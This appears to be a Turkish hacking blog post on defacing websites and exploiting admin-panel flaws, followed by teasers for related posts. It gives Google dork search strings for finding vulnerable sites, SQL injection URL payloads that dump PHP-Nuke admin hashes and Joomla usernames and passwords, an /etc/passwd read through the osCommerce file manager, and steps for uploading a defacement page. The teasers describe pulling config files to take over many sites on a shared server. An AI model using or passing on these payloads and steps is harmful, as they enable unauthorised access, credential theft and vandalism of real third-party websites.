YİNE GÜZEL BİR KONU.. İNDEX BASMA YÖNTEMLERİ ve PANEL AÇIKLARI NELERDİR??

-

İNDEX BASMA YÖNTEMLERİ

Galary açığı




 1-)Fhımage, powered by flash-here.com

bunu google yazın gelen sıtelere tıklayın sızı fotoğraf galerısıne fln ***ürür siteye girdikten sonra;
2-)imgconfig/index.php?mode=write

 bunuda adres çubuğuna yapıştırın karşınıza o sayfadaki bilgiler gelir sonra istediginizi yapn

 kotü yanı ise sizin yazdıklarınızı 10 dk sonra başka biri daha hackliyor mirror-h .comdan zone almayı unutma

 2. yöntem: Googleye aratacagımız kod:

 E-Commerce Engine Copyright © 2005 osCommerce veya powered by osCommerce

 bu kodu googleye aratın sayfalarda ilerleyin sonu adminle biten bi site bulduğunuz zaman gerin sonundaki herşeyi silin ve /admin yazın bazıları şifre ister onları geçin ve admin hesabındasınız gerisi size kalmış.

Panel açığı



arama kodu :inurl:ypanel
site sonuna ypanel/siteayarguncelle.asp
daha sonra editör olarak giriş yapıp kul.adı ve şifrenizi yazın haber ekleme bölümünden istediğinizi yapın

 yahoo'dan site hackle
ilk önce "login to wies links" a giriyoruz .
orda arama yerine bu kodu yapistir: PHP-Nuke Copyright © 2005

 sonra da arama yaptıkdan sonra yukarda arama yerinin yaninda kucuk harflerle options yaziyo ona bas.

 ve karşısına iki üç tane kucuk sey gelecek birincisine bas.
sonra yeni sayfa açılacak o sayfada en altta ülkelerin ismi var hangi ülkenin sitelerini hacklemek istersen o ülkeyi seç ve aşagıda seacrh'a bas yani aramaya bas sonra 2-3 sitelere git ve ordan bir site seç sitenin sonundakileri sil ve bu kodu yapıştı: modules.php?name=Search&type=comments&query=not123 exists&instory=/%2a%2a/UNION/%2a%2a/SELECT/%2a%2a/0,0,pwd,0,aid/%2a%2a/FROM/%2a%2a/nuke_authors

 sonra aşağıda md5 kodu çıkacak

 sonra bu kodu kopyala ve md5 kıran bir sitede şifresini bul sonra tabi admin ismide o md5 kodlarinin yanında ve site sonuna /admin.php ekle ve enter yap sonra admin paneline giris yapabilirsin.

Oscommerce 2.2 Açığı


 Şimdi sizlere basit bir file maneger açığı anlatacağım...

 1->Bir arama motoruna gidiyoruz...

 2->"admin/file_manager.php" diye aratıyoruz...

 3->Çıkan sitelerden şu url’ye gittiğimizde
hedef.com/admin/file_manager.php işte burası file maneger sayfası...

 4->Sonra şu şekilde
hedef.com/admin/file_manager.php/etc/passwd yazarak sitedeki şifreleride alabiliriz

 joomla güzel bir açık

 aratma kodu: com_neoreferences

 exp:index.php?option=com_neoreferences&Itemid=27&c atid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*

 İnurlxpoll acogo

 İnurl:xpoll şimdi aratma kodumuz inurl:xpoll dicez herhangi bi seteye gireceğiz aitenin linki böyle olacak örneğin: /xpoll/admin/images/ yada link böyle olacak örnek verdim ordaki attacker.htm !

More Tags

 Şimdi ilk önce googleye more_tags diye aratıyorz sonra 15 sayfalara geliyoruz sonu more_tags diye biten bir siteye giriyoruz sonra more_tags'ı silip yerine signup.php yazıyoruz sonra üyelik yeri gelecek ve üye oluyoruz orayı geçebilirsinizde ve üye olduktan sonra signup.php'yi siliyoruz onun yerine my_profile.php yazıyoruz oraya geldiğimiz de bir resim kutucuğu olur oraya hazırladığımız index'i koyuyoruz ama eğer resim kutucuğu yoksa başka siteye deneyin index'i eklediğimiz de orada "x" işareti çıkacak çıkmazsa başka siteye deneyin çıkarsa üzerine gelin ve sağ tuş özellikler deyin sonra ordaki siteyi alın ve adres çubuğuna yapıştırın ve sonra hacklemiş olursunuz.

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Site Hackleme Taktikleri Ve Açıklamalar

-
Resim
Site Hackleme Taktikleri ve Açıklamalar Brute Force Attacks Site Hackleme Taktikleri Ve Açıklamalar Belirli tabanlı sitelere yapılan deneme yanılma saldırılarıdır. Tam olarak bir açık değildir. Şifrelerin zayıf,kolay olması ile işe yarayan bir yöntemdir. Özel siteleri hacklerken pek fazla kullanılmaması ile beraber sayı kasmak için yapılan saldırlarda etkili bir yöntemdir.  SQL İnjection SQL İnjection sql veritabanı kullanan site ve uygulamalarda oluşan bir açıktır. Saldırganın sitede (ya da uygulamada) izinsiz şekilde sql komutları çalıştırmasına olanak sağlar. Bu şekilde etkili kullanıldığı takdirde tüm veritabanı bilgilerine erişim sağlanabilir. Dilerseniz vikipedi tanımna bakalım, daha açıklayıcı olacaktır : SQL Injection , veri tabanına dayalı uygulamalara saldırmak için kullanılan bir atak tekniğidir; burada saldırgan SQL dili özelliklerinden faydalanarak standart uygulama ekranındaki ilgili alana yeni SQL ifadelerini ekler. (Örneğin saldırgan,veritabanı içeriğini ...
Devamı

CONFİG NEDİR? Ne İşimize Yarıyacak? Config Çekme Örnekleri. - Hackerlik Okulu

-
Resim
CONFİG NEDİR? Config sitenin bilgilerinin bulunduğu ve diğer sitelerin serwerlarıyla iletişimin sağlandığı dosyadır.Tam adı config.php (wordpress) ya da configuration.php 'dir ( joomla ). Ne İşimize Yarıyacak? Evet,gelelim asıl mevzuya ne işe yarıyacağına.Biz config dosyasından db adını,db şifresini ve db kullanıcı adını alarak bi de port değişikse onu da configten öğrenerek shellin sql bölümünden kendi sitemize bağlanabiliriz. Ee diyorsunuz zaten shell attığım bir siteye bağlansam ne olacak? Zaten amaç bu değil; asıl amaç config dosyasının içindeki bilgileri çekmek. Sizin görebildiğiniz kendi sitenizin bilgileri, fakat birkaç işlemle config çekebilirsek sunucuda bulunan bütün sitelerin config.phpsine ulaşabiliriz. Bu da şu demek oluyor,1 siteyle 100'lerce, 1000'lerce site hackleyebiliriz. İşte shellin sql bölümünden sitelere bağlanabiliriz, ve şifrelerini değiştirip hepsini hackliyebiliriz. Config dosyasının işlevi bu. Çekildikten sonra db adı,portu,şifresi...
Devamı

Profesyonel Hacker Olmak İsteyenler Yeni Başlayanlar İçin Yol Haritası

-
Resim
Profesyonel Hacker Olmak İsteyenler Yeni Başlayanlar İçin Yol Haritası Beyaz Şapkalı Hacker olmak istiyorum diyenlere Hackerlerin amacı nedir ? Böyle bir soru soruldugu zaman hiç bir hacker ben hacker olucam diye yola çıkmaz. Zamanla bilgi ve birikimi onu hacker olmaya itmiştir. Artık geri dönulmez bir yola girdigini anlamıştır. Kendine bir amaç çizer. Bunlar gunumuzde genelde , İllegal hosuna gitmeyen siteleri hacklamak , Sistem açıklarını tespit edip O sisteme sızarak sistemin guvenlı olmadıgını belirtmek en buyuk zevkleri arasındadır. Hackerler biraz da egoist olurlar. Kimileri her ne kadar Hackerler tanınmaz , En iyi hacker kendini gizleyen hacker vb gibi laflar desede , bu laflar çoluk , çocuk laflarıdır. Bir hacker Sisteme girdiginde mutlaka kendini gizler , kendini tespit ettirecek şeylerden uzak durur. Fakat Hack Dünyası nda ismini duyurmak mutlaka o da isteyecek ve tanınmak isteyecektir. Fakat Gerçek bir hacker bir iş yaptıgı zaman tam yapar , öz yapar .. Yaptıgı iş d...
Devamı